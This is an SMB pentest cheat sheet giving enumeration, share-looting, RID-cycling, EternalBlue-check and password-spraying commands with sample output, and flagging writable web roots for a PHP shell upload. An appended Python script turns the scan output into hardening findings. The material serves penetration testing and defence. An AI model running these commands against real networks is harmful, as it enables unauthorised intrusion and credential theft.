SMB (139/445)

Null session enum

Comprehensive SMB enum — Users, shares, policies, groups

enum4linux -a $IP
Example Output
enum4linux -a 10.10.10.5
[+] Users:
administrator, guest, krbtgt, john.smith
[+] Shares:
IPC$, ADMIN$, C$, Backups, Users

List shares (null)

Anonymous share listing — Find accessible shares

smbclient -L //$IP -N
Example Output
smbclient -L //10.10.10.5 -N
  Sharename  Type  Comment
  --------   ----  -------
  Backups    Disk  Company backups
  Users      Disk  User directories
  ADMIN$     Disk  Remote Admin

List shares (crackmapexec)

Alternative enum — Shows read/write permissions

crackmapexec smb $IP --shares -u '' -p ''
Example Output
crackmapexec smb 10.10.10.5 --shares -u '' -p ''
  Share      Permissions  Remark
  Backups    READ         Company backups
  Users      READ,WRITE   User files
  ADMIN$     NO ACCESS
(READ,WRITE on Users = upload potential)

Connect to shares

Browse each share — Download interesting files

smbclient //$IP/<share> -N
Example Output
smbclient //10.10.10.5/Backups -N
smb: \> ls
  .                  D   0  Jan 01  2024
  old_config.bak     A  1024  Jan 01  2024
  passwords.xlsx     A  2048  Jan 01  2024
smb: \> get passwords.xlsx

Recursive download share

Grab everything — Offline analysis

smbget -R smb://$IP/<share>/
Example Output
smbget -R smb://10.10.10.5/Backups/
Downloaded 15 files
./Backups/IT/credentials.txt
./Backups/HR/employee_list.csv
(Analyze everything offline)

Enumerate users (RID cycling)

Find domain users — Build user list

crackmapexec smb $IP --rid-brute
Example Output
crackmapexec smb 10.10.10.5 --rid-brute
500: CORP\Administrator
501: CORP\Guest
1001: CORP\john.smith
1002: CORP\svc_sql
1003: CORP\admin.backup

Check for EternalBlue

MS17-010 — Instant SYSTEM shell if vuln

nmap --script smb-vuln-ms17-010 -p 445 $IP
Example Output
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Risk factor: HIGH
(Use exploit/windows/smb/ms17_010_eternalblue)

Check SMB version/signing

Version and signing status — SMBv1 = more exploits, no signing = relay

crackmapexec smb $IP
Example Output
crackmapexec smb 10.10.10.5
SMB  10.10.10.5  445  TARGET  [*] Windows 10.0 Build 17763 x64
SMB  10.10.10.5  445  TARGET  [*] SMBv1: False
SMB  10.10.10.5  445  TARGET  [*] Signing: False
(No signing = relay attacks possible)

Brute force with found users

Spray found creds — Password reuse across services

crackmapexec smb $IP -u users.txt -p passwords.txt --continue-on-success
Example Output
crackmapexec smb 10.10.10.5 -u users.txt -p passwords.txt --continue-on-success
SMB [-] corp\admin:Password1
SMB [-] corp\admin:Welcome1
SMB [+] corp\john.smith:Winter2025
(--continue-on-success finds ALL valid combos)

Check for write access

Can you upload files? — Check share permissions with smbmap, confirm with a test upload

smbmap -H $IP -u <user> -p <pass>
smbclient //$IP/<share> -U <user>
smb: \> put test.txt
Example Output
smbmap -H 10.10.10.5 -u john -p Password1
  Disk        Permissions  Comment
  ----        -----------  -------
  Backups     READ ONLY
  Users       READ, WRITE  <- can upload!
  wwwroot     READ, WRITE  <- webshell target!
(WRITE on wwwroot = upload PHP shell)
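Added example, not part of this cheat sheet: a Python triage script that reads the crackmapexec signing/SMBv1 lines from the version check above and the smbmap share table from the write-access check, and turns them into remediation findings (signing not enforced, SMBv1 enabled, WRITE granted on a share). The embedded input is constructed in the shape of those outputs, and CME_BANNER, SHARE_TABLE, parse_hosts, parse_shares and audit are this example's own names.

```python
import re

# Constructed samples shaped like the crackmapexec banner and smbmap table above (not real scan data).
CME_BANNER = """\
SMB  10.10.10.5  445  TARGET   [*] SMBv1: False
SMB  10.10.10.5  445  TARGET   [*] Signing: False
SMB  10.10.10.7  445  FILESRV  [*] Windows 6.1 Build 7601 x64 (signing:True) (SMBv1:True)
"""
SHARE_TABLE = """\
  Disk        Permissions  Comment
  Backups     READ ONLY
  Users       READ, WRITE  <- can upload!
  wwwroot     READ, WRITE  <- webshell target!
  ADMIN$      NO ACCESS
"""

HOST_RE = re.compile(r"^SMB\s+(\S+)\s+\d+\s+\S+\s+\[\*\]\s+(.*)$")
FLAG_RE = re.compile(r"(signing|smbv1)\s*[:=]\s*(true|false)", re.I)  # "Signing: False" or "(signing:False)"

def parse_hosts(text):
    """host -> {'signing': bool, 'smbv1': bool} from crackmapexec banner lines."""
    hosts = {}
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            flags = hosts.setdefault(m.group(1), {})
            for key, val in FLAG_RE.findall(m.group(2)):
                flags[key.lower()] = val.lower() == "true"
    return hosts

def parse_shares(text):
    """share name -> permission string from a smbmap/crackmapexec share table."""
    shares = {}
    for line in text.splitlines():
        parts = re.split(r"\s{2,}", line.strip())  # columns are 2+ spaces apart
        if len(parts) >= 2 and parts[1] != "Permissions" and not parts[1].startswith("-"):
            shares[parts[0]] = parts[1].upper()
    return shares

def audit(hosts, shares):
    findings = []  # one finding per misconfiguration worth remediating
    for host, flags in sorted(hosts.items()):
        if flags.get("signing") is False:
            findings.append(f"{host}: SMB signing not required (relay risk); enforce signing")
        if flags.get("smbv1") is True:
            findings.append(f"{host}: SMBv1 enabled (MS17-010 exposure); disable SMBv1")
    for name, perms in sorted(shares.items()):
        if "WRITE" in perms:
            findings.append(f"share {name}: WRITE granted; review the ACL, never on a web root")
    return findings
```

Feed it the saved output of the commands above and each finding maps to one hardening action for the host or share owner.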